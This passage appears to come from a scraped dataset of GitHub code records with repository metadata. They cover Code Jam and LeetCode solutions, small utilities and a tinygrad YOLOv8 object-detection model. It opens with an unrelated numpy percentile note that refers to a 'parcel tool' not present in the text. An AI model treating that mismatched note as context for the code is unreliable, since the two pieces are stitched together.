1, 
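The per-parcel percentile loop in the parcel tool's main flow above (1.0 - count(greater)/n for every parcel) is quadratic in the parcel count. np.searchsorted computes the same "share of parcels scoring at or below this one" figure in one pass over a sorted copy. A check on toy scores:

import numpy as np

scores = np.array([3.0, 1.0, 4.0, 1.0, 5.0])
n = len(scores)
loop_pct = np.array([1.0 - np.sum(scores > s) / n for s in scores])
vec_pct = np.searchsorted(np.sort(scores), scores, side="right") / n
print(np.allclose(loop_pct, vec_pct), vec_pct)   # True [0.6 0.4 0.8 0.4 1. ]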
s))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/669.py","file_name":"669.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23425834371","text":"#!/usr/bin/env python\r\n\r\nfrom __future__ import print_function\r\n\r\nimport sys\r\nfrom collections import defaultdict\r\n\r\n\r\ndef main(*args):\r\n if(len(args) < 2):\r\n print(\"Usage: %s \" % args[0])\r\n\r\n filename = args[1]\r\n input_file = open(filename, \"rb\")\r\n output_file = open(filename+\".out\", \"wb\")\r\n\r\n try:\r\n in_str = input_file.readline().strip()\r\n except:\r\n print(\"Premature end of input\")\r\n\r\n T = int(in_str)\r\n for k in range(T):\r\n input_strs = input_file.readline().split()\r\n C = float(input_strs[0])\r\n F = float(input_strs[1])\r\n X = float(input_strs[2])\r\n\r\n time_taken = 0.0\r\n cookie_rate = 2.0\r\n while(True):\r\n if(X/cookie_rate < (C/cookie_rate + X/(F+cookie_rate)) ):\r\n time_taken += X / cookie_rate\r\n # print('Time taken:', time_taken)\r\n # print('cookie_rate:', cookie_rate)\r\n break\r\n else:\r\n time_taken += C / cookie_rate\r\n cookie_rate += F\r\n # print('Time taken:', time_taken)\r\n # print('cookie_rate:', cookie_rate)\r\n\r\n print(\"Case #%d: %0.7f\" % (k+1, time_taken), file=output_file)\r\n \r\n input_file.close()\r\n output_file.close()\r\n\r\n\r\nif(__name__ == \"__main__\"):\r\n sys.exit(main(*sys.argv))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2754.py","file_name":"2754.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8981510715","text":"import speech_recognition as sr\n\n# recognize speech using Google Speech Recognition\ndef get_recognize_google():\n try:\n r = sr.Recognizer()\n with sr.Microphone() as source:\n audio = r.listen(source)\n return r.recognize_google(audio)\n except sr.UnknownValueError:\n return \"No puedo entender el audio\"\n except sr.RequestError as e:\n return \"No se pudieron solicitar resultados del servicio de reconocimiento de voz de Google\" \n\n","repo_name":"konkut/Chatbot","sub_path":"speech__recognition.py","file_name":"speech__recognition.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565738434","text":"\nfrom typing import List\nclass Solution:\n \n \n def findNumbers(self, nums: List[int]) -> int:\n \n # convert all number to string, store in list\n strnum_list = list( map( str, nums) )\n \n # a functor to judge if a string is with even number digits\n func_even_digits = lambda x: (len(x)%2==0)\n \n # use functor to select those strings with even number digits\n list_even_num_of_digits = list( filter( func_even_digits, strnum_list) )\n \n # total count of even digits number\n return len( list_even_num_of_digits )\n \n\n\n\n# n : the number of elements in input list\n\n## Time Complexity: O(n)\n#\n# The overhead in time is the hidden iteraion of O( n ) in map... 
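The Cookie Clicker loop above buys a farm exactly while "wait for the farm, then win at the faster rate" beats "win at the current rate", i.e. while C/r + X/(r+F) < X/r. A self-contained restatement, checked against the sample case from the problem statement (C=500, F=4, X=2000, expected answer 526.1904762):

def cookie_time(C, F, X, rate=2.0):
    t = 0.0
    while C / rate + X / (rate + F) < X / rate:
        t += C / rate      # wait for the next farm
        rate += F
    return t + X / rate    # then just wait for X cookies

print("%.7f" % cookie_time(500.0, 4.0, 2000.0))   # 526.1904762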
and list constructor.\n\n## Space Complexity: O(n)\n#\n# The overhead in space is to maintain a string list of order O( n )\n\n\n\ndef test_bench():\n\n test_data = [12,345,2,6,7896]\n\n \n\n print( Solution().findNumbers(test_data) )\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1295_Find Numbers with Even Number of Digits/find_number_with_even_number_of_digits.py","file_name":"find_number_with_even_number_of_digits.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"11600516299","text":"from sys import argv,stdout\nfrom time import sleep\n\ninfile = open(argv[1])\noutfile = stdout.buffer\n\ndef readfile():\n global last_time\n for line in infile:\n sline = line.strip()\n current_time = float(sline.split(\" \")[0])\n sleep(current_time-last_time)\n message = bytes.fromhex(sline.split(\" \")[1])\n outfile.write(message)\n outfile.flush()\n last_time = current_time\n\nwhile True:\n last_time = 0\n readfile()\n infile.seek(0)\n\n \n","repo_name":"Haschtl/RTOC-Plugins","sub_path":"HoldPeak VC820/holdPeak_VC820/vc820py/replay_rawtime.py","file_name":"replay_rawtime.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72267443715","text":"# by hege\r\n\r\nimport os\r\nimport sys\r\nimport zipfile\r\n\r\n# package\r\nimport ctypes\r\nimport logging\r\nimport sqlite3\r\n\r\n# lib path\r\nlib_path = os.path.dirname(os.__file__)\r\n\r\n# create small zipfile with just a few libraries\r\ndef make_smallzip():\r\n\tzip_path = \"libsmall.zip\"\r\n\tzip_path = os.path.abspath(os.path.join(os.path.dirname(__file__),zip_path))\r\n\tif os.path.exists(zip_path):\r\n\t\tos.unlink(zip_path)\r\n\tzip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED)\r\n\tzip_obj.writepy(os.path.dirname(ctypes.__file__))\r\n\tzip_obj.writepy(os.path.dirname(logging.__file__))\r\n\tzip_obj.writepy(os.path.dirname(sqlite3.__file__))\r\n\tzip_obj.close()\r\n\r\n# create medium zipfile with everything in top-level stdlib\r\ndef make_mediumzip():\r\n\tzip_path = \"libmedium.zip\"\r\n\tif os.path.exists(zip_path):\r\n\t\tos.unlink(zip_path)\r\n\tzip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED)\r\n\tzip_obj.writepy(lib_path)\r\n\tzip_obj.close()\r\n\r\n# create large zipfile with everything we can find\r\ndef make_bigzip():\r\n\tzip_path = \"libbig.zip\"\r\n\tif os.path.exists(zip_path):\r\n\t\tos.unlink(zip_path)\r\n\t#zip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED,optimize=-1)\r\n\tzip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED)\r\n\tzip_obj.writepy(lib_path)\r\n\tfor (root,dirs,files) in os.walk(lib_path):\r\n\t\tif os.path.basename(root) in (\"idlelib\",\"test\",\"tkinter\",\"turtledemo\",):\r\n\t\t\tdel dirs[:]\r\n\t\t\tcontinue\r\n\t\tif \"__init__.py\" in files:\r\n\t\t\tdel dirs[:]\r\n\t\t\ttry:\r\n\t\t\t\t#print(root)\r\n\t\t\t\tzip_obj.writepy(root)\r\n\t\t\texcept (EnvironmentError,SyntaxError,):\r\n\t\t\t\tpass\r\n\tzip_obj.close()\r\n\r\nif __name__ == 
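A quick way to verify the archives that make_smallzip and friends produce is to list the compiled modules back out; Python's built-in zipimport then lets the interpreter import straight from the archive once it is on sys.path, with no extraction step. A sketch, assuming libsmall.zip was just built in the working directory:

import zipfile

with zipfile.ZipFile("libsmall.zip") as z:
    pycs = [n for n in z.namelist() if n.endswith(".pyc")]
    print(len(pycs), "compiled modules, e.g.", pycs[:3])

# To consume the archive, prepend it to the import path:
# import sys; sys.path.insert(0, "libsmall.zip")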
\"__main__\":\r\n\tmake_smallzip()\r\n\tmake_mediumzip()\r\n\tmake_bigzip()","repo_name":"hefen1/kalpa","sub_path":"tools/scripts/make_python_ziplib.py","file_name":"make_python_ziplib.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3688825558","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nimport sys\nargs = [eval(x) for x in sys.argv[1:]]\nsuma, godini, god_procent= args[:3]\n#godini2, god_procent2 = args[3:] and args[3:5] or (0,0)\n\ndef calc( suma, godini, god_procent, G2M =12):\n#http://krediten-kalkulator.bghot.com/\n meseci = godini*G2M\n mes_lihva = god_procent /100.0/G2M\n x= (1 + mes_lihva) ** meseci\n mes_suma = (suma * x * mes_lihva)/(x-1)\n vse_suma = mes_suma * meseci\n return mes_suma, vse_suma\n\nif god_procent<0:\n merka,G2M,god_procent = 'den',365,-god_procent\nelse:\n merka,G2M,god_procent = 'mesec',12,god_procent\nmes_suma, vse_suma = calc( suma, godini, god_procent, G2M)\nprint( #int(mes_suma), '/'+merka,\n int(vse_suma/godini/12), '/m',\n '==', int(vse_suma), int(vse_suma*100/suma),'%', )\n\n# vim:ts=4:sw=4:expandtab\n","repo_name":"svilendobrev/svd_bin","sub_path":"misc/lih.py","file_name":"lih.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"sr","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"38064908457","text":"import sys\ninput = sys.stdin.readline\n\n\ndef main():\n\n def find(x):\n if x == p[x]:\n return x\n p[x] = find(p[x])\n return p[x]\n\n def union(x, y):\n x = find(x)\n y = find(y)\n if x < y:\n p[y] = x\n else:\n p[x] = y\n\n n = int(input())\n p = [i for i in range(n)]\n m = int(input())\n for i in range(n):\n tmp = list(map(int, input().split()))\n for j in range(n):\n if i != j and tmp[j] == 1:\n union(i, j)\n\n ans = set()\n for n in map(lambda x: int(x)-1, input().split()):\n ans.add(find(n))\n if len(ans) > 1:\n print(\"NO\")\n exit()\n print(\"YES\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj1976.py","file_name":"bj1976.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24818102931","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(8, 8), dpi=80) # initializing a fig with 8x8 inches\n\n# initial some (x,y) data points in numpy array\nx = np.linspace(0.,40.,1000)\ny1 = np.sin(x)*np.exp(-x*0.10)\ny2 = np.cos(x)*np.exp(-x*0.15)\ny3 = np.sin(x*2.0)*np.sin(x*0.2)*np.random.rand(x.size)\n\nplt.subplot(2, 1, 1) # initial a subplot, from grid of 1x2\nplt.plot(x, y1, color = 'blue', linewidth = 2, linestyle = '-')\nplt.plot(x, y2, color = 'red', linewidth = 2, linestyle = '--')\nplt.ylim(-1.,+1.)\n\nplt.subplot(2, 1, 2) # initial another subplot\nplt.plot(x, y3, color = 'green', linewidth = 1)\n\nplt.show()","repo_name":"yipeichan/Numerical_Ananlysis_and_Programming","sub_path":"l8-example-02.py","file_name":"l8-example-02.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21771290692","text":"from tinygrad.nn import Conv2d, BatchNorm2d\nfrom tinygrad.tensor import Tensor\nimport numpy as np\nfrom itertools import chain\nfrom pathlib import Path\nimport cv2\nfrom collections import defaultdict\nimport time, sys\nfrom tinygrad.helpers import fetch\nfrom 
tinygrad.nn.state import safe_load, load_state_dict\n\n#Model architecture from https://github.com/ultralytics/ultralytics/issues/189\n#The upsampling class has been taken from this pull request https://github.com/tinygrad/tinygrad/pull/784 by dc-dc-dc. Now 2(?) models use upsampling. (retinet and this)\n\n#Pre processing image functions.\ndef compute_transform(image, new_shape=(640, 640), auto=False, scaleFill=False, scaleup=True, stride=32):\n shape = image.shape[:2] # current shape [height, width]\n new_shape = (new_shape, new_shape) if isinstance(new_shape, int) else new_shape\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n r = min(r, 1.0) if not scaleup else r\n new_unpad = (int(round(shape[1] * r)), int(round(shape[0] * r)))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1]\n dw, dh = (np.mod(dw, stride), np.mod(dh, stride)) if auto else (0.0, 0.0)\n new_unpad = (new_shape[1], new_shape[0]) if scaleFill else new_unpad\n dw /= 2\n dh /= 2\n image = cv2.resize(image, new_unpad, interpolation=cv2.INTER_LINEAR) if shape[::-1] != new_unpad else image\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n image = cv2.copyMakeBorder(image, top, bottom, left, right, cv2.BORDER_CONSTANT, value=(114, 114, 114))\n return image\n\ndef preprocess(im, imgsz=640, model_stride=32, model_pt=True):\n same_shapes = all(x.shape == im[0].shape for x in im)\n auto = same_shapes and model_pt\n im = Tensor([compute_transform(x, new_shape=imgsz, auto=auto, stride=model_stride) for x in im])\n im = Tensor.stack(im) if im.shape[0] > 1 else im\n im = im[..., ::-1].permute(0, 3, 1, 2) # BGR to RGB, BHWC to BCHW, (n, 3, h, w)\n im /= 255 # 0 - 255 to 0.0 - 1.0\n return im\n\n# Post Processing functions\ndef box_area(box):\n return (box[:, 2] - box[:, 0]) * (box[:, 3] - box[:, 1])\n\ndef box_iou(box1, box2):\n lt = np.maximum(box1[:, None, :2], box2[:, :2])\n rb = np.minimum(box1[:, None, 2:], box2[:, 2:])\n wh = np.clip(rb - lt, 0, None)\n inter = wh[:, :, 0] * wh[:, :, 1]\n area1 = box_area(box1)[:, None]\n area2 = box_area(box2)[None, :]\n iou = inter / (area1 + area2 - inter)\n return iou\n\ndef compute_nms(boxes, scores, iou_threshold):\n order, keep = scores.argsort()[::-1], []\n while order.size > 0:\n i = order[0]\n keep.append(i)\n if order.size == 1:\n break\n iou = box_iou(boxes[i][None, :], boxes[order[1:]])\n inds = np.where(iou.squeeze() <= iou_threshold)[0]\n order = order[inds + 1]\n return np.array(keep)\n\ndef non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, agnostic=False, max_det=300, nc=0, max_wh=7680):\n prediction = prediction[0] if isinstance(prediction, (list, tuple)) else prediction\n bs, nc = prediction.shape[0], nc or (prediction.shape[1] - 4)\n xc = np.amax(prediction[:, 4:4 + nc], axis=1) > conf_thres\n nm = prediction.shape[1] - nc - 4\n output = [np.zeros((0, 6 + nm))] * bs\n\n for xi, x in enumerate(prediction):\n x = x.swapaxes(0, -1)[xc[xi]]\n if not x.shape[0]: continue\n box, cls, mask = np.split(x, [4, 4 + nc], axis=1)\n conf, j = np.max(cls, axis=1, keepdims=True), np.argmax(cls, axis=1, keepdims=True)\n x = np.concatenate((xywh2xyxy(box), conf, j.astype(np.float32), mask), axis=1)\n x = x[conf.ravel() > conf_thres]\n if not x.shape[0]: continue\n x = x[np.argsort(-x[:, 4])]\n c = x[:, 5:6] * (0 if agnostic else max_wh)\n boxes, scores = x[:, :4] + c, x[:, 4]\n i = compute_nms(boxes, scores, iou_thres)[:max_det]\n output[xi] = x[i]\n return output\n\ndef 
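box_iou and compute_nms above can be sanity-checked with three boxes, two of which overlap heavily: at an IoU threshold of 0.5 the lower-scoring overlap is suppressed. (This usage example calls compute_nms as defined in this file; only numpy is needed besides it.)

import numpy as np

boxes = np.array([[0, 0, 10, 10],     # kept (highest score)
                  [1, 1, 11, 11],     # IoU ~0.68 with the first -> suppressed
                  [50, 50, 60, 60]],  # disjoint -> kept
                 dtype=float)
scores = np.array([0.9, 0.8, 0.7])
print(compute_nms(boxes, scores, iou_threshold=0.5))   # [0 2]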
postprocess(preds, img, orig_imgs):\n print('copying to CPU now for post processing')\n #if you are on CPU, this causes an overflow runtime error. doesn't \"seem\" to make any difference in the predictions though.\n # TODO: make non_max_suppression in tinygrad - to make this faster\n preds = preds.numpy() if isinstance(preds, Tensor) else preds\n preds = non_max_suppression(prediction=preds, conf_thres=0.25, iou_thres=0.7, agnostic=False, max_det=300)\n all_preds = []\n for i, pred in enumerate(preds):\n orig_img = orig_imgs[i] if isinstance(orig_imgs, list) else orig_imgs\n if not isinstance(orig_imgs, Tensor):\n pred[:, :4] = scale_boxes(img.shape[2:], pred[:, :4], orig_img.shape)\n all_preds.append(pred)\n return all_preds\n\ndef draw_bounding_boxes_and_save(orig_img_paths, output_img_paths, all_predictions, class_labels, iou_threshold=0.5):\n color_dict = {label: tuple((((i+1) * 50) % 256, ((i+1) * 100) % 256, ((i+1) * 150) % 256)) for i, label in enumerate(class_labels)}\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n def is_bright_color(color):\n r, g, b = color\n brightness = (r * 299 + g * 587 + b * 114) / 1000\n return brightness > 127\n\n for img_idx, (orig_img_path, output_img_path, predictions) in enumerate(zip(orig_img_paths, output_img_paths, all_predictions)):\n predictions = np.array(predictions)\n orig_img = cv2.imread(orig_img_path) if not isinstance(orig_img_path, np.ndarray) else cv2.imdecode(orig_img_path, 1)\n height, width, _ = orig_img.shape\n box_thickness = int((height + width) / 400)\n font_scale = (height + width) / 2500\n\n grouped_preds = defaultdict(list)\n object_count = defaultdict(int)\n\n for pred_np in predictions:\n grouped_preds[int(pred_np[-1])].append(pred_np)\n\n def draw_box_and_label(pred, color):\n x1, y1, x2, y2, conf, _ = pred\n x1, y1, x2, y2 = map(int, (x1, y1, x2, y2))\n cv2.rectangle(orig_img, (x1, y1), (x2, y2), color, box_thickness)\n label = f\"{class_labels[class_id]} {conf:.2f}\"\n text_size, _ = cv2.getTextSize(label, font, font_scale, 1)\n label_y, bg_y = (y1 - 4, y1 - text_size[1] - 4) if y1 - text_size[1] - 4 > 0 else (y1 + text_size[1], y1)\n cv2.rectangle(orig_img, (x1, bg_y), (x1 + text_size[0], bg_y + text_size[1]), color, -1)\n font_color = (0, 0, 0) if is_bright_color(color) else (255, 255, 255)\n cv2.putText(orig_img, label, (x1, label_y), font, font_scale, font_color, 1, cv2.LINE_AA)\n\n for class_id, pred_list in grouped_preds.items():\n pred_list = np.array(pred_list)\n while len(pred_list) > 0:\n max_conf_idx = np.argmax(pred_list[:, 4])\n max_conf_pred = pred_list[max_conf_idx]\n pred_list = np.delete(pred_list, max_conf_idx, axis=0)\n color = color_dict[class_labels[class_id]]\n draw_box_and_label(max_conf_pred, color)\n object_count[class_labels[class_id]] += 1\n iou_scores = box_iou(np.array([max_conf_pred[:4]]), pred_list[:, :4])\n low_iou_indices = np.where(iou_scores[0] < iou_threshold)[0]\n pred_list = pred_list[low_iou_indices]\n for low_conf_pred in pred_list:\n draw_box_and_label(low_conf_pred, color)\n\n print(f\"Image {img_idx + 1}:\")\n print(\"Objects detected:\")\n for obj, count in object_count.items():\n print(f\"- {obj}: {count}\")\n\n cv2.imwrite(output_img_path, orig_img)\n print(f'saved detections at {output_img_path}')\n\n# utility functions for forward pass.\ndef dist2bbox(distance, anchor_points, xywh=True, dim=-1):\n lt, rb = distance.chunk(2, dim)\n x1y1 = anchor_points - lt\n x2y2 = anchor_points + rb\n if xywh:\n c_xy = (x1y1 + x2y2) / 2\n wh = x2y2 - x1y1\n return c_xy.cat(wh, dim=1)\n return 
x1y1.cat(x2y2, dim=1)\n\ndef make_anchors(feats, strides, grid_cell_offset=0.5):\n anchor_points, stride_tensor = [], []\n assert feats is not None\n for i, stride in enumerate(strides):\n _, _, h, w = feats[i].shape\n sx = Tensor.arange(w) + grid_cell_offset\n sy = Tensor.arange(h) + grid_cell_offset\n\n # this is np.meshgrid but in tinygrad\n sx = sx.reshape(1, -1).repeat([h, 1]).reshape(-1)\n sy = sy.reshape(-1, 1).repeat([1, w]).reshape(-1)\n\n anchor_points.append(Tensor.stack((sx, sy), -1).reshape(-1, 2))\n stride_tensor.append(Tensor.full((h * w), stride))\n anchor_points = anchor_points[0].cat(anchor_points[1], anchor_points[2])\n stride_tensor = stride_tensor[0].cat(stride_tensor[1], stride_tensor[2]).unsqueeze(1)\n return anchor_points, stride_tensor\n\n# this function is from the original implementation\ndef autopad(k, p=None, d=1): # kernel, padding, dilation\n if d > 1:\n k = d * (k - 1) + 1 if isinstance(k, int) else [d * (x - 1) + 1 for x in k] # actual kernel-size\n if p is None:\n p = k // 2 if isinstance(k, int) else [x // 2 for x in k] # auto-pad\n return p\n\ndef clip_boxes(boxes, shape):\n boxes[..., [0, 2]] = np.clip(boxes[..., [0, 2]], 0, shape[1]) # x1, x2\n boxes[..., [1, 3]] = np.clip(boxes[..., [1, 3]], 0, shape[0]) # y1, y2\n return boxes\n\ndef scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None):\n gain = ratio_pad if ratio_pad else min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1])\n pad = ((img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2)\n boxes_np = boxes.numpy() if isinstance(boxes, Tensor) else boxes\n boxes_np[..., [0, 2]] -= pad[0]\n boxes_np[..., [1, 3]] -= pad[1]\n boxes_np[..., :4] /= gain\n boxes_np = clip_boxes(boxes_np, img0_shape)\n return boxes_np\n\ndef xywh2xyxy(x):\n xy = x[..., :2] # center x, y\n wh = x[..., 2:4] # width, height\n xy1 = xy - wh / 2 # top left x, y\n xy2 = xy + wh / 2 # bottom right x, y\n result = np.concatenate((xy1, xy2), axis=-1)\n return Tensor(result) if isinstance(x, Tensor) else result\n\ndef get_variant_multiples(variant):\n return {'n':(0.33, 0.25, 2.0), 's':(0.33, 0.50, 2.0), 'm':(0.67, 0.75, 1.5), 'l':(1.0, 1.0, 1.0), 'x':(1, 1.25, 1.0) }.get(variant, None)\n\ndef label_predictions(all_predictions):\n class_index_count = defaultdict(int)\n for predictions in all_predictions:\n predictions = np.array(predictions)\n for pred_np in predictions:\n class_id = int(pred_np[-1])\n class_index_count[class_id] += 1\n\n return dict(class_index_count)\n\n#this is taken from https://github.com/tinygrad/tinygrad/pull/784/files by dc-dc-dc (Now 2 models use upsampling)\nclass Upsample:\n def __init__(self, scale_factor:int, mode: str = \"nearest\") -> None:\n assert mode == \"nearest\" # only mode supported for now\n self.mode = mode\n self.scale_factor = scale_factor\n\n def __call__(self, x: Tensor) -> Tensor:\n assert len(x.shape) > 2 and len(x.shape) <= 5\n (b, c), _lens = x.shape[:2], len(x.shape[2:])\n tmp = x.reshape([b, c, -1] + [1] * _lens) * Tensor.ones(*[1, 1, 1] + [self.scale_factor] * _lens)\n return tmp.reshape(list(x.shape) + [self.scale_factor] * _lens).permute([0, 1] + list(chain.from_iterable([[y+2, y+2+_lens] for y in range(_lens)]))).reshape([b, c] + [x * self.scale_factor for x in x.shape[2:]])\n\nclass Conv_Block:\n def __init__(self, c1, c2, kernel_size=1, stride=1, groups=1, dilation=1, padding=None):\n self.conv = Conv2d(c1,c2, kernel_size, stride, padding=autopad(kernel_size, padding, dilation), bias=False, groups=groups, dilation=dilation)\n 
self.bn = BatchNorm2d(c2, eps=0.001)\n\n def __call__(self, x):\n return self.bn(self.conv(x)).silu()\n\nclass Bottleneck:\n def __init__(self, c1, c2 , shortcut: bool, g=1, kernels: list = (3,3), channel_factor=0.5):\n c_ = int(c2 * channel_factor)\n self.cv1 = Conv_Block(c1, c_, kernel_size=kernels[0], stride=1, padding=None)\n self.cv2 = Conv_Block(c_, c2, kernel_size=kernels[1], stride=1, padding=None, groups=g)\n self.residual = c1 == c2 and shortcut\n\n def __call__(self, x):\n return x + self.cv2(self.cv1(x)) if self.residual else self.cv2(self.cv1(x))\n\nclass C2f:\n def __init__(self, c1, c2, n=1, shortcut=False, g=1, e=0.5):\n self.c = int(c2 * e)\n self.cv1 = Conv_Block(c1, 2 * self.c, 1,)\n self.cv2 = Conv_Block((2 + n) * self.c, c2, 1)\n self.bottleneck = [Bottleneck(self.c, self.c, shortcut, g, kernels=[(3, 3), (3, 3)], channel_factor=1.0) for _ in range(n)]\n\n def __call__(self, x):\n y= list(self.cv1(x).chunk(2, 1))\n y.extend(m(y[-1]) for m in self.bottleneck)\n z = y[0]\n for i in y[1:]: z = z.cat(i, dim=1)\n return self.cv2(z)\n\nclass SPPF:\n def __init__(self, c1, c2, k=5):\n c_ = c1 // 2 # hidden channels\n self.cv1 = Conv_Block(c1, c_, 1, 1, padding=None)\n self.cv2 = Conv_Block(c_ * 4, c2, 1, 1, padding=None)\n\n # TODO: this pads with 0s, whereas torch function pads with -infinity. This results in a < 2% difference in prediction which does not make a difference visually.\n self.maxpool = lambda x : x.pad2d((k // 2, k // 2, k // 2, k // 2)).max_pool2d(kernel_size=k, stride=1)\n\n def __call__(self, x):\n x = self.cv1(x)\n x2 = self.maxpool(x)\n x3 = self.maxpool(x2)\n x4 = self.maxpool(x3)\n return self.cv2(x.cat(x2, x3, x4, dim=1))\n\nclass DFL:\n def __init__(self, c1=16):\n self.conv = Conv2d(c1, 1, 1, bias=False)\n x = Tensor.arange(c1)\n self.conv.weight.assign(x.reshape(1, c1, 1, 1))\n self.c1 = c1\n\n def __call__(self, x):\n b, c, a = x.shape # batch, channels, anchors\n return self.conv(x.reshape(b, 4, self.c1, a).transpose(2, 1).softmax(1)).reshape(b, 4, a)\n\n#backbone\nclass Darknet:\n def __init__(self, w, r, d):\n self.b1 = [Conv_Block(c1=3, c2= int(64*w), kernel_size=3, stride=2, padding=1), Conv_Block(int(64*w), int(128*w), kernel_size=3, stride=2, padding=1)]\n self.b2 = [C2f(c1=int(128*w), c2=int(128*w), n=round(3*d), shortcut=True), Conv_Block(int(128*w), int(256*w), 3, 2, 1), C2f(int(256*w), int(256*w), round(6*d), True)]\n self.b3 = [Conv_Block(int(256*w), int(512*w), kernel_size=3, stride=2, padding=1), C2f(int(512*w), int(512*w), round(6*d), True)]\n self.b4 = [Conv_Block(int(512*w), int(512*w*r), kernel_size=3, stride=2, padding=1), C2f(int(512*w*r), int(512*w*r), round(3*d), True)]\n self.b5 = [SPPF(int(512*w*r), int(512*w*r), 5)]\n\n def return_modules(self):\n return [*self.b1, *self.b2, *self.b3, *self.b4, *self.b5]\n\n def __call__(self, x):\n x1 = x.sequential(self.b1)\n x2 = x1.sequential(self.b2)\n x3 = x2.sequential(self.b3)\n x4 = x3.sequential(self.b4)\n x5 = x4.sequential(self.b5)\n return (x2, x3, x5)\n\n#yolo fpn (neck)\nclass Yolov8NECK:\n def __init__(self, w, r, d): #width_multiple, ratio_multiple, depth_multiple\n self.up = Upsample(2, mode='nearest')\n self.n1 = C2f(c1=int(512*w*(1+r)), c2=int(512*w), n=round(3*d), shortcut=False)\n self.n2 = C2f(c1=int(768*w), c2=int(256*w), n=round(3*d), shortcut=False)\n self.n3 = Conv_Block(c1=int(256*w), c2=int(256*w), kernel_size=3, stride=2, padding=1)\n self.n4 = C2f(c1=int(768*w), c2=int(512*w), n=round(3*d), shortcut=False)\n self.n5 = Conv_Block(c1=int(512* w), c2=int(512 * w), 
kernel_size=3, stride=2, padding=1)\n self.n6 = C2f(c1=int(512*w*(1+r)), c2=int(512*w*r), n=round(3*d), shortcut=False)\n\n def return_modules(self):\n return [self.n1, self.n2, self.n3, self.n4, self.n5, self.n6]\n\n def __call__(self, p3, p4, p5):\n x = self.n1(self.up(p5).cat(p4, dim=1))\n head_1 = self.n2(self.up(x).cat(p3, dim=1))\n head_2 = self.n4(self.n3(head_1).cat(x, dim=1))\n head_3 = self.n6(self.n5(head_2).cat(p5, dim=1))\n return [head_1, head_2, head_3]\n\n#task specific head.\nclass DetectionHead:\n def __init__(self, nc=80, filters=()):\n self.ch = 16\n self.nc = nc # number of classes\n self.nl = len(filters)\n self.no = nc + self.ch * 4 #\n self.stride = [8, 16, 32]\n c1 = max(filters[0], self.nc)\n c2 = max((filters[0] // 4, self.ch * 4))\n self.dfl = DFL(self.ch)\n self.cv3 = [[Conv_Block(x, c1, 3), Conv_Block(c1, c1, 3), Conv2d(c1, self.nc, 1)] for x in filters]\n self.cv2 = [[Conv_Block(x, c2, 3), Conv_Block(c2, c2, 3), Conv2d(c2, 4 * self.ch, 1)] for x in filters]\n\n def __call__(self, x):\n for i in range(self.nl):\n x[i] = (x[i].sequential(self.cv2[i]).cat(x[i].sequential(self.cv3[i]), dim=1))\n self.anchors, self.strides = (x.transpose(0, 1) for x in make_anchors(x, self.stride, 0.5))\n y = [(i.reshape(x[0].shape[0], self.no, -1)) for i in x]\n x_cat = y[0].cat(y[1], y[2], dim=2)\n box, cls = x_cat[:, :self.ch * 4], x_cat[:, self.ch * 4:]\n dbox = dist2bbox(self.dfl(box), self.anchors.unsqueeze(0), xywh=True, dim=1) * self.strides\n z = dbox.cat(cls.sigmoid(), dim=1)\n return z\n\nclass YOLOv8:\n def __init__(self, w, r, d, num_classes): #width_multiple, ratio_multiple, depth_multiple\n self.net = Darknet(w, r, d)\n self.fpn = Yolov8NECK(w, r, d)\n self.head = DetectionHead(num_classes, filters=(int(256*w), int(512*w), int(512*w*r)))\n\n def __call__(self, x):\n x = self.net(x)\n x = self.fpn(*x)\n return self.head(x)\n\n def return_all_trainable_modules(self):\n backbone_modules = [*range(10)]\n yolov8neck_modules = [12, 15, 16, 18, 19, 21]\n yolov8_head_weights = [(22, self.head)]\n return [*zip(backbone_modules, self.net.return_modules()), *zip(yolov8neck_modules, self.fpn.return_modules()), *yolov8_head_weights]\n\nif __name__ == '__main__':\n\n # usage : python3 yolov8.py \"image_URL OR image_path\" \"v8 variant\" (optional, n is default)\n if len(sys.argv) 